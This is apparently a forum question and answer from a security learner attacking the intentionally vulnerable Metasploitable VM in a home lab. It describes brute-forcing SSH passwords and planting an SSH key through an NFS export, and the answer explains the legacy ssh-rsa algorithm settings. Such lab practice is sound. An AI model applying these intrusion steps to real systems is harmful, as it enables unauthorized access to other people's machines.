SSH not recognizing that my public RSA key is already in the authorized_keys folder?

Question

Apologies if the question is really simple, however I have not been able to find a solution yet.

I am exploring the exploitation potential of Kali Linux on the popular Metasploitable vulnerable server. This is done through connecting the two via a NAT Network in Virtualbox.

I have completed a Nessus scan and it revealed that the Metasploitable machine is vulnerable to NFS mounting exploits. I researched this further and it seemed like an easy way to gain password-less access via SSH.

I have already gained access through SSH by brute forcing the password to three accounts (user, postgres and msfadmin), however, I wanted to go a step further and understand how NFS can lead to vulnerabilities.

I followed the steps in this tutorial: https://www.youtube.com/watch?v=i0_t3zl_X_E

I used ssh-keygen to generate a new RSA key:

keygen image

I copied the RSA key into Metasploitable's authorized_keys file

copying the file

I verified that the new key was added on the metasploitable side:

verification

Now I should (according to the video) be able to login via ssh using ssh [email protected] after unmounting the file

I get the following error:

error image

I have researched why this may be happening, and one answer I found was to do with file permissions, or using the command setsebool -P use_nfs_home_dirs 1

I tried using chmod to change the permissions but this did not work, and ended up breaking the VM at some point (goes to show my lack of understanding, but trying all the different chmod options without a clue as to which one will work might take a long time).

setsebool didn't work either as i couldn't install the package which it was in using apt-get install policycoreutils (404 error, try using apt-get update or --fix-missing)

However, clearly I am able to SSH into the system through the use of the cracked passwords, although I still get the same error UNTIL I use the flag -oHostKeyAlgorithms=+ssh-rsa. Note that this does not work when added to ssh [email protected], only when using ssh -oHostKeyAlgorithms+=ssh-rsa [email protected]

Essentially, i want to know why SSH can't recognise that my public key is already in the authorized_keys file

Many thanks to anyone able to point me in the right direction.

Answer 1

i want to know why SSH can't recognise that my public key is already in the authorized_keys file

On the one hand, the error message you get is talking about the host key – not the one you're using, but the one that the server identifies with (and which goes into your 'known_hosts' file). The sshd service on that VM only supports old signature algorithms that the new client no longer accepts.

On the other hand, the same algorithms are supported for both directions. If the server does not support rsa-sha2 for signing with its host key, then it also doesn't support rsa-sha2 for verifying signatures you send from your user key. So it's not enough to only allow the old ssh-rsa via HostKeyAlgorithms – you also need to allow it through PubkeyAcceptedAlgorithms, otherwise the client won't even offer its own key as it thinks all available algorithms are not supported.